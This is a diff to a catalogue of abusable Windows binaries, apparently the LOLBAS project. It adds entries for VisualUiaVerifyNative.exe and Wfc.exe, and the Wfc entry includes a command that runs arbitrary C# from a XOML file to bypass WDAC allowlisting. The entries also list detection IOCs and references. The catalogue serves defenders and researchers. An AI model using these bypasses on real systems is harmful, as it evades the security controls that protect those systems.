- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
|
||||
- Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
|
||||
Acknowledgement:
|
||||
- Person: Lee Christensen
|
||||
Handle: '@tifkin'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
28
yml/OtherMSBinaries/Wfc.yml
Normal file
28
yml/OtherMSBinaries/Wfc.yml
Normal file
@ -0,0 +1,28 @@
|
||||
---
|
||||
Name: Wfc.exe
|
||||
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: wfc.exe c:\path\to\test.xoml
|
||||
Description: Execute arbitrary C# code embedded in a XOML file.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
|
||||
Code_Sample:
|
||||
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
@ -13,6 +13,7 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
|
||||
|
Loading…
Reference in New Issue
Block a user